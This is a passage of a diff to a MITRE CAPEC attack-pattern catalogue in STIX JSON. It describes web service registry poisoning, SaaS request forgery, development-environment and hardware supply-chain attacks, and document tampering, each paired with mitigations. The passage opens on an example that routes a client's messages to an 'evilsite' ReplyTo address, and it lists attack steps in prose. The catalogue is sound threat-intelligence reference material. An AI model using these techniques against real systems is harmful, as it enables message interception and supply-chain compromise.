http://validfaults.example/ErrorHandler\n \n \n In this example \"evilsite\" is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with ReplyTo header it will not generate a Soap fault.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a target SOA or Web Service: The adversary must first indentify a target SOA or Web Service.

Experiment

  1. Determine desired outcome: Because poisoning a web service registry can have different outcomes, the adversary must decide how they wish to effect the webservice.

    2. Techniques
    An adversary can perform a denial of service attack on a web service.
    An adversary can redirect requests or responses to a malicious service.

  2. Determine if a malicious service needs to be created: If the adversary wishes to redirect requests or responses, they will need to create a malicious service to redirect to.

    3. Techniques
    Create a service to that requests are sent to in addition to the legitimate service and simply record the requests.
    Create a service that will give malicious responses to a service provider.
    Act as a malicious service provider and respond to requests in an arbitrary way.

Exploit

  1. Poison Web Service Registry: Based on the desired outcome, poison the web service registry. This is done by altering the data at rest in the registry or uploading malicious content by spoofing a service provider.

    2. Techniques
    Intercept and change WS-Adressing headers to route to a malicious service or service provider.
    Provide incorrect information in schema or metadata to cause a denial of service.
    Delete information about service procider interfaces to cause a denial of service.
", + "x_capec_extended_description": "\n WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to write to resources or redirect access to the service registry." + ], + "x_capec_resources_required": [ + "Capability to directly or indirectly modify registry resources" + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9eeb3709-308b-45ca-90e5-649033d1458c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Harden registry server and file access permissions", + "id": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-51-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "spec_version": "2.1", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement communications to and from the registry using secure protocols", + "id": "course-of-action--6bfceaeb-b87d-430f-aa56-ddb8fa9e9e6f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-51-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dab8cada-a8f1-46a8-a212-2685d9e6bf9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6bfceaeb-b87d-430f-aa56-ddb8fa9e9e6f", + "spec_version": "2.1", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user's session. This attack is executed after a trusted user is authenticated into a cloud service, \"piggy-backing\" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user's privilege level.", + "external_references": [ + { + "external_id": "CAPEC-510", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/510.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "description": "Ami Luttwak, A new Zeus variant targeting Salesforce.com – Research and Analysis, Adallom, Inc.", + "external_id": "REF-438", + "source_name": "reference_from_CAPEC", + "url": "http://www.adallom.com/blog/a-new-zeus-variant-targeting-salesforce-com-accounts-research-and-analysis/" + } + ], + "id": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "modified": "2014-06-23T00:00:00.000Z", + "name": "SaaS User Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the trusted user's system and convince the user to execute it while authenticated to the SaaS application." + ], + "x_capec_skills_required": { + "Medium": "This attack pattern often requires the technical ability to modify a malicious software package (e.g. Zeus) to spider a targeted site and a way to trick a user into a malicious software download." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To limit one's exposure to this type of attack, tunnel communications through a secure proxy service.", + "id": "course-of-action--e62f0d4e-f4f4-4170-83dc-b3e1355d1c94", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-510-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0e244a6-ae66-4ca3-bd73-5e27032bc927", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e62f0d4e-f4f4-4170-83dc-b3e1355d1c94", + "spec_version": "2.1", + "target_ref": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Detection of this type of attack can be done through heuristic analysis of behavioral anomalies (a la credit card fraud detection) which can be used to identify inhuman behavioral patterns. (e.g., spidering)", + "id": "course-of-action--ac725580-35cd-425b-84ba-2c7669ba0116", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-510-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--217875b4-959c-4ec6-a80c-6f5897b54681", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac725580-35cd-425b-84ba-2c7669ba0116", + "spec_version": "2.1", + "target_ref": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses common delivery mechanisms such as email attachments or removable media to infiltrate the IDE (Integrated Development Environment) of a victim manufacturer with the intent of implanting malware allowing for attack control of the victim IDE environment. The attack then uses this access to exfiltrate sensitive data or information, manipulate said data or information, and conceal these actions. This will allow and aid the attack to meet the goal of future compromise of a recipient of the victim's manufactured product further down in the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-511", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/511.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Infiltration of Software Development Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "The attacker, knowing the victim runs email on a system adjacent to the IDE system, sends a phishing email with a malicious attachment to the victim. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent IDE system from the victim's workstation. The attacker is then able to exfiltrate sensitive data about the software being developed on the IDE system.", + "Using rogue versions of Xcode (Apple's app development tool) downloaded from third-party websites, it was possible for the adversary to insert malicious code into legitimate apps during the development process." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).", + "The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.", + "The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure." + ], + "x_capec_skills_required": { + "High": "Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)", + "Medium": "Intelligence about the manufacturer's operating environment and infrastructure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid the common delivery mechanisms of adversaries, such as email attachments, which could introduce the malware.", + "id": "course-of-action--93c2b59e-bb08-4808-9f42-695b972f908e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-511-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--acf31545-11ce-4c74-9740-158a6572cd6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93c2b59e-bb08-4808-9f42-695b972f908e", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to system components during allocated baseline development can substitute a maliciously altered hardware component for a baseline component during the product development and research phases. This can lead to adjustments and calibrations being made in the product so that when the final product, now containing the modified component, is deployed it will not perform as designed and be advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-516", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/516.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution During Baselining", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary supplies the product development facility of a network security device with a hardware component that is used to simulate large volumes of network traffic. The device claims in logs, stats, and via the display panel to be pumping out very large quantities of network traffic, when it is in fact putting out very low volumes. The developed product is adjusted and configured to handle what it believes to be a heavy network load, but when deployed at the victim site the large volumes of network traffic are dropped instead of being processed by the network security device. This allows the adversary an advantage when attacking the victim in that the adversary's presence may not be detected by the device.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary will need either physical access or be able to supply malicious hardware components to the product development facility." + ], + "x_capec_skills_required": { + "High": "Resources to physically infiltrate supplier.", + "Medium": "Intelligence data on victim's purchasing habits." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hardware attacks are often difficult to detect, as inserted components can be difficult to identify or remain dormant for an extended period of time.", + "id": "course-of-action--62164250-4c65-4a4d-b6db-0f1e9fd43d4f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5a845e64-34a5-43e1-8fa0-f36bd296a642", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--62164250-4c65-4a4d-b6db-0f1e9fd43d4f", + "spec_version": "2.1", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.", + "id": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0174af7d-b07c-4326-98d7-485d81f6876c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation, which include descriptions of advanced technology and/or specific components' criticality, alters the documents to circumvent dial-down functionality requirements. This alteration would change the interpretation of implementation and manufacturing techniques, allowing for advanced technologies to remain in place even though these technologies might be restricted to certain customers, such as nations on the terrorist watch list, giving the attacker on the receiving end of a shipped product access to an advanced technology that might otherwise be restricted.", + "external_references": [ + { + "external_id": "CAPEC-517", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/517.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Circumvent Dial-down", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "A product for manufacture exists that contains advanced cryptographic capabilities, including algorithms that are restricted from being shipped to some nations. An attacker from one of the restricted nations alters the documentation to ensure that when the product is manufactured for shipment to a restricted nation, the software compilation steps that normally would prevent the advanced cryptographic capabilities from being included are actually included. When the product is shipped to the attacker's home country, the attacker is able to retrieve and/or use the advanced cryptographic capabilities." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of internal software and hardware components within manufacturer's development environment.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Digitize documents and cryptographically sign them to verify authenticity.", + "id": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6cdce0e6-c111-4a35-bd94-2fd9bc65869b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Password protect documents and make them read-only for unauthorized users.", + "id": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1a2f5635-3164-4960-8cc1-c813d8955f6c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid emailing important documents and configurations.", + "id": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure deleted files are actually deleted.", + "id": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e4cacf14-7742-4ddf-95a4-24294756229f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain backups of the document for recovery and verification.", + "id": "course-of-action--6adbdfe4-b1d6-43dd-880d-318b88f93118", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--693e162c-2556-4f8e-8c5f-d33b4a5b2891", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6adbdfe4-b1d6-43dd-880d-318b88f93118", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation alters the descriptions of system capabilities with the intent of causing errors in derived system requirements, impacting the overall effectiveness and capability of the system, allowing an attacker to take advantage of the introduced system capability flaw once the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-518", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/518.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Produce Under-performing Systems", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "A security subsystem involving encryption is a part of a product, but due to the demands of this subsystem during operation, the subsystem only runs when a specific amount of memory and processing is available. An attacker alters the descriptions of the system capabilities so that when deployed with the minimal requirements at the victim location, the encryption subsystem is never operational, leaving the system in a weakened security state." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of software and hardware capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec5bea13-d325-4683-9122-b0c7ccec06d4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--281d70fc-8c58-4d68-b561-0575eb42bff4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9382bcf3-0604-4bb8-9d38-f4c17b9747d8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 